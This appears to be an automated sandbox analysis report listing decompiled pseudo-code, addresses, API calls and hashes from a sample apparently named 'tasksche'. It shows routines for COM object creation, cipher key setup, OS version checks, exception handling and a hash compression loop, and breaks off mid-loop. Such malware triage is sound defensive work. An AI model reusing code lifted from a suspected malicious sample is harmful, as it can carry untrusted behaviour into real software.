                                                                                              0x00413f36
                                                                                              0x00000000
                                                                                              0x00413f40
                                                                                              0x00413efd
                                                                                              0x00413f04
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041422a

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID:
                                                                                              • API String ID: 2102423945-0
                                                                                              • Opcode ID: 9c54e9cdedc4d1f5f0a70ee5fbfd421263a38b40d6fcac4ed0c82430486a0b60
                                                                                              • Instruction ID: 3562be7dcc5a33f83423fe2ddc28cf6e78eed116dec30ec79901489c8d2199a3
                                                                                              • Opcode Fuzzy Hash: 9c54e9cdedc4d1f5f0a70ee5fbfd421263a38b40d6fcac4ed0c82430486a0b60
                                                                                              • Instruction Fuzzy Hash: CBA11472A00208EBDB04DF65C581BED77B5AB94304F24447FE942EB282C77C9AC2DB59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 49%
                                                                                              			E00419BB0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                              				void* _v8;
                                                                                              				void* _v12;
                                                                                              				char* _t34;
                                                                                              				intOrPtr* _t36;
                                                                                              				intOrPtr* _t38;
                                                                                              				intOrPtr* _t40;
                                                                                              				intOrPtr* _t42;
                                                                                              				intOrPtr* _t44;
                                                                                              				intOrPtr* _t46;
                                                                                              				intOrPtr* _t48;
                                                                                              				intOrPtr* _t50;
                                                                                              				intOrPtr* _t52;
                                                                                              				intOrPtr* _t54;
                                                                                              				void* _t56;
                                                                                              				void* _t57;
                                                                                              				intOrPtr _t63;
                                                                                              
                                                                                              				_t34 =  &_v8;
                                                                                              				_t57 = 0;
                                                                                              				__imp__CoCreateInstance(0x42b1f8, 0, 1, 0x42b148, _t34, _t56, __ecx, __ecx);
                                                                                              				if(_t34 >= 0) {
                                                                                              					_t36 = _v8;
                                                                                              					_push( &_v12);
                                                                                              					_push(0x42b1e8);
                                                                                              					_push(_t36);
                                                                                              					if( *((intOrPtr*)( *_t36))() >= 0) {
                                                                                              						if(_a4 != 0) {
                                                                                              							_t54 = _v12;
                                                                                              							 *((intOrPtr*)( *_t54 + 0x14))(_t54, _a12, 2);
                                                                                              						}
                                                                                              						_t40 = _v8;
                                                                                              						 *((intOrPtr*)( *_t40 + 0x50))(_t40, _a8);
                                                                                              						if(_a20 != _t57) {
                                                                                              							_t52 = _v8;
                                                                                              							 *((intOrPtr*)( *_t52 + 0x1c))(_t52, _a20);
                                                                                              						}
                                                                                              						_t42 = _v8;
                                                                                              						_t63 =  *_t42;
                                                                                              						_push(_t57);
                                                                                              						if(_a24 != _t57) {
                                                                                              							_push(_a24);
                                                                                              						} else {
                                                                                              							_push(0x42a73c);
                                                                                              						}
                                                                                              						 *((intOrPtr*)(_t63 + 0x44))(_t42);
                                                                                              						if(_a28 != _t57) {
                                                                                              							_t50 = _v8;
                                                                                              							 *((intOrPtr*)( *_t50 + 0x2c))(_t50, _a28);
                                                                                              						}
                                                                                              						if(_a16 != _t57) {
                                                                                              							_t48 = _v8;
                                                                                              							 *((intOrPtr*)( *_t48 + 0x24))(_t48, _a16);
                                                                                              						}
                                                                                              						_t44 = _v12;
                                                                                              						_push(1);
                                                                                              						_push(_a12);
                                                                                              						_push(_t44);
                                                                                              						if( *((intOrPtr*)( *_t44 + 0x18))() >= 0) {
                                                                                              							_t57 = 1;
                                                                                              						}
                                                                                              						_t46 = _v12;
                                                                                              						 *((intOrPtr*)( *_t46 + 8))(_t46);
                                                                                              					}
                                                                                              					_t38 = _v8;
                                                                                              					 *((intOrPtr*)( *_t38 + 8))(_t38);
                                                                                              				}
                                                                                              				return _t57;
                                                                                              			}



















                                                                                              0x00419bb6
                                                                                              0x00419bc1
                                                                                              0x00419bc9
                                                                                              0x00419bd1
                                                                                              0x00419bd7
                                                                                              0x00419bdf
                                                                                              0x00419be0
                                                                                              0x00419be5
                                                                                              0x00419bea
                                                                                              0x00419bf3
                                                                                              0x00419bf5
                                                                                              0x00419c00
                                                                                              0x00419c00
                                                                                              0x00419c03
                                                                                              0x00419c0c
                                                                                              0x00419c12
                                                                                              0x00419c14
                                                                                              0x00419c1d
                                                                                              0x00419c1d
                                                                                              0x00419c20
                                                                                              0x00419c23
                                                                                              0x00419c25
                                                                                              0x00419c29
                                                                                              0x00419c32
                                                                                              0x00419c2b
                                                                                              0x00419c2b
                                                                                              0x00419c2b
                                                                                              0x00419c36
                                                                                              0x00419c3c
                                                                                              0x00419c3e
                                                                                              0x00419c47
                                                                                              0x00419c47
                                                                                              0x00419c4d
                                                                                              0x00419c4f
                                                                                              0x00419c58
                                                                                              0x00419c58
                                                                                              0x00419c5b
                                                                                              0x00419c60
                                                                                              0x00419c62
                                                                                              0x00419c65
                                                                                              0x00419c6b
                                                                                              0x00419c6d
                                                                                              0x00419c6d
                                                                                              0x00419c6f
                                                                                              0x00419c75
                                                                                              0x00419c75
                                                                                              0x00419c78
                                                                                              0x00419c7e
                                                                                              0x00419c7e
                                                                                              0x00419c85

                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(0042B1F8,00000000,00000001,0042B148,?), ref: 00419BC9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInstance
                                                                                              • String ID:
                                                                                              • API String ID: 542301482-0
                                                                                              • Opcode ID: 291608a549582a43ab036b31c95ed53b806bcf03129be81fab9f556b712dc9f9
                                                                                              • Instruction ID: e9337f94160ec10d5a134cda80235c1f61728acff05639409476ed3799cc72ed
                                                                                              • Opcode Fuzzy Hash: 291608a549582a43ab036b31c95ed53b806bcf03129be81fab9f556b712dc9f9
                                                                                              • Instruction Fuzzy Hash: FC311875A00209EFCF04CFA0C898DAA7BB9EF49304B204499F942DB250D739EE51DBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 90%
                                                                                              			E0040CA52(signed char* __ecx, intOrPtr __edx, void* __edi, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                              				signed char* _v8;
                                                                                              				unsigned int _v16;
                                                                                              				char _v24;
                                                                                              				char _v40;
                                                                                              				void* _t32;
                                                                                              				signed int _t33;
                                                                                              				void* _t34;
                                                                                              				void* _t36;
                                                                                              				void* _t39;
                                                                                              				intOrPtr _t41;
                                                                                              				char _t44;
                                                                                              				char _t47;
                                                                                              				intOrPtr _t48;
                                                                                              				signed int _t54;
                                                                                              				void* _t55;
                                                                                              				signed int _t57;
                                                                                              				intOrPtr* _t60;
                                                                                              				signed char* _t61;
                                                                                              				void* _t63;
                                                                                              
                                                                                              				_t55 = __edi;
                                                                                              				_v8 = __ecx;
                                                                                              				_push(_t41);
                                                                                              				asm("cpuid");
                                                                                              				_t60 =  &_v24;
                                                                                              				 *_t60 = 1;
                                                                                              				 *((intOrPtr*)(_t60 + 4)) = _t41;
                                                                                              				 *((intOrPtr*)(_t60 + 8)) = 0;
                                                                                              				 *((intOrPtr*)(_t60 + 0xc)) = __edx;
                                                                                              				_t61 = _v8;
                                                                                              				 *_t61 = _v16 >> 0x00000019 & 0x00000001;
                                                                                              				_t32 = _a12 - 0x80;
                                                                                              				if(_t32 == 0) {
                                                                                              					_t47 = 0x10;
                                                                                              					_t61[4] = 0xa;
                                                                                              				} else {
                                                                                              					_t39 = _t32 - 0x40;
                                                                                              					if(_t39 == 0) {
                                                                                              						_t47 = 0x18;
                                                                                              						_t61[4] = 0xc;
                                                                                              					} else {
                                                                                              						if(_t39 != 0x40) {
                                                                                              							_t47 = _a4;
                                                                                              						} else {
                                                                                              							_t47 = 0x20;
                                                                                              							_t61[4] = 0xe;
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				_t33 = 0;
                                                                                              				if(_t47 <= 0) {
                                                                                              					L11:
                                                                                              					_t48 = _a16;
                                                                                              					_t71 = _t48;
                                                                                              					if(_t48 != 0) {
                                                                                              						_t34 = 0;
                                                                                              						__eflags = 0;
                                                                                              						do {
                                                                                              							_t61[_t34 + 8] =  *((intOrPtr*)(_t34 + _t48));
                                                                                              							_t34 = _t34 + 1;
                                                                                              							__eflags = _t34 - 0x10;
                                                                                              						} while (__eflags < 0);
                                                                                              						L15:
                                                                                              						_t36 = E0040C4FF(_t61, _t71,  &_v40);
                                                                                              						if(_a4 == 0) {
                                                                                              							_t36 = E0040C6C4(_t61);
                                                                                              						}
                                                                                              						return _t36;
                                                                                              					}
                                                                                              					_t20 =  &(_t61[8]); // 0x8
                                                                                              					E0041A820(_t55, _t20, _t48, 0x10);
                                                                                              					goto L15;
                                                                                              				} else {
                                                                                              					_push(_t55);
                                                                                              					do {
                                                                                              						_t44 =  *((intOrPtr*)(_t33 + _a8));
                                                                                              						_t54 = _t33 >> 2;
                                                                                              						_t57 = _t33 & 0x00000003;
                                                                                              						_t33 = _t33 + 1;
                                                                                              						 *((char*)(_t63 + _t57 - 0x24 + _t54 * 4)) = _t44;
                                                                                              					} while (_t33 < _t47);
                                                                                              					_pop(_t55);
                                                                                              					goto L11;
                                                                                              				}
                                                                                              			}






















                                                                                              0x0040ca52
                                                                                              0x0040ca5b
                                                                                              0x0040ca60
                                                                                              0x0040ca61
                                                                                              0x0040ca64
                                                                                              0x0040ca67
                                                                                              0x0040ca69
                                                                                              0x0040ca6c
                                                                                              0x0040ca6f
                                                                                              0x0040ca75
                                                                                              0x0040ca7d
                                                                                              0x0040ca82
                                                                                              0x0040ca87
                                                                                              0x0040caad
                                                                                              0x0040caae
                                                                                              0x0040ca89
                                                                                              0x0040ca89
                                                                                              0x0040ca8c
                                                                                              0x0040caa1
                                                                                              0x0040caa2
                                                                                              0x0040ca8e
                                                                                              0x0040ca91
                                                                                              0x0040cab7
                                                                                              0x0040ca93
                                                                                              0x0040ca95
                                                                                              0x0040ca96
                                                                                              0x0040ca96
                                                                                              0x0040ca91
                                                                                              0x0040ca8c
                                                                                              0x0040caba
                                                                                              0x0040cabe
                                                                                              0x0040cade
                                                                                              0x0040cade
                                                                                              0x0040cae1
                                                                                              0x0040cae3
                                                                                              0x0040caf6
                                                                                              0x0040caf6
                                                                                              0x0040caf8
                                                                                              0x0040cafb
                                                                                              0x0040caff
                                                                                              0x0040cb00
                                                                                              0x0040cb00
                                                                                              0x0040cb05
                                                                                              0x0040cb0b
                                                                                              0x0040cb14
                                                                                              0x0040cb18
                                                                                              0x0040cb18
                                                                                              0x0040cb20
                                                                                              0x0040cb20
                                                                                              0x0040cae8
                                                                                              0x0040caec
                                                                                              0x00000000
                                                                                              0x0040cac0
                                                                                              0x0040cac0
                                                                                              0x0040cac1
                                                                                              0x0040cac4
                                                                                              0x0040cacb
                                                                                              0x0040cace
                                                                                              0x0040cad1
                                                                                              0x0040cad6
                                                                                              0x0040cad9
                                                                                              0x0040cadd
                                                                                              0x00000000
                                                                                              0x0040cadd

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID:
                                                                                              • API String ID: 2102423945-0
                                                                                              • Opcode ID: f170c41e67568dbb41c50a43ec108573c349a1076046e87b2a713adcc681154b
                                                                                              • Instruction ID: e1f0199fda650a5869103b9083c5b7a650503f912fa59dbaeb4dd54c60283149
                                                                                              • Opcode Fuzzy Hash: f170c41e67568dbb41c50a43ec108573c349a1076046e87b2a713adcc681154b
                                                                                              • Instruction Fuzzy Hash: 0721F672704209DFD724CF28D4817AA7BE5AB19300F10892FD896E73C2C678E9458B49
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00409C06() {
                                                                                              				struct _OSVERSIONINFOW _v280;
                                                                                              				signed int _t6;
                                                                                              				intOrPtr _t12;
                                                                                              
                                                                                              				_t12 =  *0x43003c; // 0xffffffff
                                                                                              				if(_t12 != 0xffffffff) {
                                                                                              					_t6 =  *0x4335d4; // 0x0
                                                                                              				} else {
                                                                                              					_v280.dwOSVersionInfoSize = 0x114;
                                                                                              					GetVersionExW( &_v280);
                                                                                              					_t12 = _v280.dwPlatformId;
                                                                                              					_t6 = _v280.dwMajorVersion;
                                                                                              					 *0x43003c = _t12;
                                                                                              					 *0x4335d4 = _t6;
                                                                                              					 *0x4335d0 = _v280.dwMinorVersion;
                                                                                              				}
                                                                                              				if(_t12 != 2) {
                                                                                              					return 0x501;
                                                                                              				} else {
                                                                                              					return (_t6 << 8) +  *0x4335d0;
                                                                                              				}
                                                                                              			}






                                                                                              0x00409c09
                                                                                              0x00409c18
                                                                                              0x00409c56
                                                                                              0x00409c1a
                                                                                              0x00409c21
                                                                                              0x00409c2b
                                                                                              0x00409c31
                                                                                              0x00409c37
                                                                                              0x00409c43
                                                                                              0x00409c49
                                                                                              0x00409c4e
                                                                                              0x00409c4e
                                                                                              0x00409c5e
                                                                                              0x00409c71
                                                                                              0x00409c60
                                                                                              0x00409c6a
                                                                                              0x00409c6a

                                                                                              APIs
                                                                                              • GetVersionExW.KERNEL32(?), ref: 00409C2B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: Version
                                                                                              • String ID:
                                                                                              • API String ID: 1889659487-0
                                                                                              • Opcode ID: 1145292b874a8e7a56bde58bed546469a1a499fc1dbdbc0264d61b52db470385
                                                                                              • Instruction ID: d7c6bb9a1732f6c2eece22a2b410928bcf9985e9f3444315991ea75afaaef588
                                                                                              • Opcode Fuzzy Hash: 1145292b874a8e7a56bde58bed546469a1a499fc1dbdbc0264d61b52db470385
                                                                                              • Instruction Fuzzy Hash: E4F0F4B1A041088FDB28CF18E992A99B7F5A748305F1002A5D619D3390DA78AE81CF69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E004234CE() {
                                                                                              
                                                                                              				SetUnhandledExceptionFilter(E0042348C);
                                                                                              				return 0;
                                                                                              			}



                                                                                              0x004234d3
                                                                                              0x004234db

                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0002348C), ref: 004234D3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: c83ebaee86b923b47ec218d74108a47e8bb0214f05dc8ef17ebda85afd4cada2
                                                                                              • Instruction ID: 1b01da781a1f42b14bf088c4285091799bc00e9a7c54fca4454c541a30810ab4
                                                                                              • Opcode Fuzzy Hash: c83ebaee86b923b47ec218d74108a47e8bb0214f05dc8ef17ebda85afd4cada2
                                                                                              • Instruction Fuzzy Hash: 539002603521104746112BB06C1D51565A17F48617BD104A5B401C5054DA598621551B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 73%
                                                                                              			E00404986(void* __eax, intOrPtr _a4) {
                                                                                              				signed int _v8;
                                                                                              				signed int _v12;
                                                                                              				signed int _v16;
                                                                                              				signed int _v20;
                                                                                              				signed int _v24;
                                                                                              				signed int _v28;
                                                                                              				signed int _v32;
                                                                                              				signed int _v36;
                                                                                              				signed int _v40;
                                                                                              				signed int _v44;
                                                                                              				signed int _v48;
                                                                                              				signed int _v52;
                                                                                              				signed int _v56;
                                                                                              				signed int _v60;
                                                                                              				signed int _v64;
                                                                                              				void _v68;
                                                                                              				void _v132;
                                                                                              				void* _t219;
                                                                                              				signed int* _t220;
                                                                                              				void* _t223;
                                                                                              				signed int* _t226;
                                                                                              				signed int _t229;
                                                                                              				signed int _t230;
                                                                                              				signed int _t231;
                                                                                              				signed int _t233;
                                                                                              				signed int _t238;
                                                                                              				signed int _t240;
                                                                                              				signed int _t241;
                                                                                              				signed int _t242;
                                                                                              				void* _t244;
                                                                                              				intOrPtr _t245;
                                                                                              				signed int _t252;
                                                                                              				signed int _t257;
                                                                                              				signed int _t259;
                                                                                              				signed int _t265;
                                                                                              				signed int _t270;
                                                                                              				signed int _t275;
                                                                                              				signed int _t280;
                                                                                              				signed int _t282;
                                                                                              				signed int _t283;
                                                                                              				signed int _t285;
                                                                                              				signed int _t289;
                                                                                              				signed int _t290;
                                                                                              				signed int _t293;
                                                                                              				signed int _t294;
                                                                                              				signed int _t300;
                                                                                              				signed int _t301;
                                                                                              				signed int _t303;
                                                                                              				signed int _t315;
                                                                                              				signed int _t316;
                                                                                              				signed int _t341;
                                                                                              				signed int _t346;
                                                                                              				signed int _t347;
                                                                                              				signed int _t348;
                                                                                              				signed int _t353;
                                                                                              				signed int _t357;
                                                                                              				signed int _t358;
                                                                                              				signed int _t362;
                                                                                              				void* _t364;
                                                                                              
                                                                                              				_t245 = _a4;
                                                                                              				_t233 = 0x10;
                                                                                              				memcpy( &_v132, __eax, _t233 << 2);
                                                                                              				_push(8);
                                                                                              				_t219 = memcpy( &_v68,  *(_t245 + 0xf4), 0 << 2);
                                                                                              				_t220 =  *(_t245 + 0xfc);
                                                                                              				_t238 =  *_t219 ^ 0x510e527f;
                                                                                              				_t341 =  *(_t219 + 4) ^ 0x9b05688c;
                                                                                              				_v8 = _t220[1] ^ 0x5be0cd19;
                                                                                              				_v36 = 0x6a09e667;
                                                                                              				_v32 = 0xbb67ae85;
                                                                                              				_v28 = 0x3c6ef372;
                                                                                              				_v24 = 0xa54ff53a;
                                                                                              				_v12 =  *_t220 ^ 0x1f83d9ab;
                                                                                              				_t223 = 0;
                                                                                              				while(1) {
                                                                                              					_t18 = _t223 + 0x42a4d0; // 0x3020100
                                                                                              					_t229 = _v68 +  *((intOrPtr*)(_t364 + ( *_t18 & 0x000000ff) * 4 - 0x80)) + _v52;
                                                                                              					_t24 = _t223 + 0x42a4d1; // 0x4030201
                                                                                              					_t252 = _t229 ^ _t238;
                                                                                              					asm("ror edx, 0x10");
                                                                                              					_v36 = _v36 + _t252;
                                                                                              					_t240 = _v52 ^ _v36;
                                                                                              					asm("ror ecx, 0xc");
                                                                                              					_t230 = _t229 +  *((intOrPtr*)(_t364 + ( *_t24 & 0x000000ff) * 4 - 0x80)) + _t240;
                                                                                              					_v68 = _t230;
                                                                                              					_t231 = _t230 ^ _t252;
                                                                                              					_t33 = _t223 + 0x42a4d2; // 0x5040302
                                                                                              					asm("ror ebx, 0x8");
                                                                                              					_v64 = _v64 +  *((intOrPtr*)(_t364 + ( *_t33 & 0x000000ff) * 4 - 0x80)) + _v48;
                                                                                              					_v36 = _v36 + _t231;
                                                                                              					_t241 = _t240 ^ _v36;
                                                                                              					_t257 = _v64 ^ _t341;
                                                                                              					_t44 = _t223 + 0x42a4d3; // 0x6050403
                                                                                              					asm("ror ecx, 0x7");
                                                                                              					asm("ror edx, 0x10");
                                                                                              					_v32 = _v32 + _t257;
                                                                                              					_v16 = _t257;
                                                                                              					_t259 = _v48 ^ _v32;
                                                                                              					_t315 = _v40;
                                                                                              					asm("ror edx, 0xc");
                                                                                              					_v64 = _v64 +  *((intOrPtr*)(_t364 + ( *_t44 & 0x000000ff) * 4 - 0x80)) + _t259;
                                                                                              					_t346 = _v64 ^ _v16;
                                                                                              					asm("ror esi, 0x8");
                                                                                              					_v32 = _v32 + _t346;
                                                                                              					_v16 = _t346;
                                                                                              					_t347 = _v44;
                                                                                              					asm("ror edx, 0x7");
                                                                                              					_v48 = _t259 ^ _v32;
                                                                                              					_t64 = _t223 + 0x42a4d4; // 0x7060504
                                                                                              					_v60 = _v60 +  *((intOrPtr*)(_t364 + ( *_t64 & 0x000000ff) * 4 - 0x80)) + _t347;
                                                                                              					_t265 = _v60 ^ _v12;
                                                                                              					asm("ror edx, 0x10");
                                                                                              					_v28 = _v28 + _t265;
                                                                                              					_t348 = _t347 ^ _v28;
                                                                                              					_v12 = _t265;
                                                                                              					_t76 = _t223 + 0x42a4d5; // 0x8070605
                                                                                              					asm("ror esi, 0xc");
                                                                                              					_v60 = _v60 +  *((intOrPtr*)(_t364 + ( *_t76 & 0x000000ff) * 4 - 0x80)) + _t348;
                                                                                              					_t270 = _v60 ^ _v12;
                                                                                              					asm("ror edx, 0x8");
                                                                                              					_v28 = _v28 + _t270;
                                                                                              					_v12 = _t270;
                                                                                              					_t88 = _t223 + 0x42a4d6; // 0x9080706
                                                                                              					_v56 = _v56 +  *((intOrPtr*)(_t364 + ( *_t88 & 0x000000ff) * 4 - 0x80)) + _t315;
                                                                                              					_t275 = _v56 ^ _v8;
                                                                                              					asm("ror esi, 0x7");
                                                                                              					asm("ror edx, 0x10");
                                                                                              					_v24 = _v24 + _t275;
                                                                                              					_t316 = _t315 ^ _v24;
                                                                                              					_v44 = _t348 ^ _v28;
                                                                                              					_v8 = _t275;
                                                                                              					_t101 = _t223 + 0x42a4d7; // 0xa090807
                                                                                              					asm("ror edi, 0xc");
                                                                                              					_v56 = _v56 +  *((intOrPtr*)(_t364 + ( *_t101 & 0x000000ff) * 4 - 0x80)) + _t316;
                                                                                              					_t280 = _v56 ^ _v8;
                                                                                              					asm("ror edx, 0x8");
                                                                                              					_v24 = _v24 + _t280;
                                                                                              					_v8 = _t280;
                                                                                              					_t113 = _t223 + 0x42a4d8; // 0xb0a0908
                                                                                              					_t282 = _v48;
                                                                                              					_v68 = _v68 +  *((intOrPtr*)(_t364 + ( *_t113 & 0x000000ff) * 4 - 0x80)) + _t282;
                                                                                              					_t353 = _v68 ^ _v8;
                                                                                              					asm("ror edi, 0x7");
                                                                                              					asm("ror esi, 0x10");
                                                                                              					_v28 = _v28 + _t353;
                                                                                              					_t283 = _t282 ^ _v28;
                                                                                              					_v40 = _t316 ^ _v24;
                                                                                              					_t126 = _t223 + 0x42a4d9; // 0xc0b0a09
                                                                                              					asm("ror edx, 0xc");
                                                                                              					_v68 = _v68 +  *((intOrPtr*)(_t364 + ( *_t126 & 0x000000ff) * 4 - 0x80)) + _t283;
                                                                                              					_v48 = _t283;
                                                                                              					_t285 = _v68 ^ _t353;
                                                                                              					asm("ror edx, 0x8");
                                                                                              					_v28 = _v28 + _t285;
                                                                                              					_v8 = _t285;
                                                                                              					_t139 = _t223 + 0x42a4db; // 0xe0d0c0b
                                                                                              					asm("ror edx, 0x7");
                                                                                              					_v48 = _v48 ^ _v28;
                                                                                              					_t144 = _t223 + 0x42a4da; // 0xd0c0b0a
                                                                                              					_t289 = _v44;
                                                                                              					_v64 = _v64 +  *((intOrPtr*)(_t364 + ( *_t144 & 0x000000ff) * 4 - 0x80)) + _t289;
                                                                                              					_t357 = _v64 ^ _t231;
                                                                                              					asm("ror esi, 0x10");
                                                                                              					_v24 = _v24 + _t357;
                                                                                              					_t290 = _t289 ^ _v24;
                                                                                              					asm("ror edx, 0xc");
                                                                                              					_v64 = _v64 +  *((intOrPtr*)(_t364 + ( *_t139 & 0x000000ff) * 4 - 0x80)) + _t290;
                                                                                              					asm("ror edi, 0x8");
                                                                                              					_t358 = _v64 ^ _t357;
                                                                                              					_v24 = _v24 + _t358;
                                                                                              					_t161 = _t223 + 0x42a4dd; // 0xe0f0e0d
                                                                                              					asm("ror edx, 0x7");
                                                                                              					_v44 = _t290 ^ _v24;
                                                                                              					_t166 = _t223 + 0x42a4dc; // 0xf0e0d0c
                                                                                              					_v20 = _t358;
                                                                                              					_t293 = _v40;
                                                                                              					_v60 = _v60 +  *((intOrPtr*)(_t364 + ( *_t166 & 0x000000ff) * 4 - 0x80)) + _t293;
                                                                                              					_t362 = _v60 ^ _v16;
                                                                                              					asm("ror esi, 0x10");
                                                                                              					_v36 = _v36 + _t362;
                                                                                              					_t294 = _t293 ^ _v36;
                                                                                              					asm("ror edx, 0xc");
                                                                                              					_v60 = _v60 +  *((intOrPtr*)(_t364 + ( *_t161 & 0x000000ff) * 4 - 0x80)) + _t294;
                                                                                              					asm("ror edi, 0x8");
                                                                                              					_t341 = _v60 ^ _t362;
                                                                                              					_v36 = _v36 + _t341;
                                                                                              					_t185 = _t223 + 0x42a4df; // 0x40a0e0f
                                                                                              					asm("ror edx, 0x7");
                                                                                              					_v40 = _t294 ^ _v36;
                                                                                              					_t190 = _t223 + 0x42a4de; // 0xa0e0f0e
                                                                                              					_v56 = _v56 +  *((intOrPtr*)(_t364 + ( *_t190 & 0x000000ff) * 4 - 0x80)) + _t241;
                                                                                              					_t300 = _v56 ^ _v12;
                                                                                              					_t223 = _t223 + 0x10;
                                                                                              					asm("ror edx, 0x10");
                                                                                              					_v32 = _v32 + _t300;
                                                                                              					_t242 = _t241 ^ _v32;
                                                                                              					_v16 = _t341;
                                                                                              					asm("ror ecx, 0xc");
                                                                                              					_v56 = _v56 +  *((intOrPtr*)(_t364 + ( *_t185 & 0x000000ff) * 4 - 0x80)) + _t242;
                                                                                              					asm("ror edi, 0x8");
                                                                                              					_t301 = _v56 ^ _t300;
                                                                                              					_v32 = _v32 + _t301;
                                                                                              					_v12 = _t301;
                                                                                              					asm("ror ecx, 0x7");
                                                                                              					_v52 = _t242 ^ _v32;
                                                                                              					if(_t223 > 0x90) {
                                                                                              						break;
                                                                                              					}
                                                                                              					_t238 = _v20;
                                                                                              				}
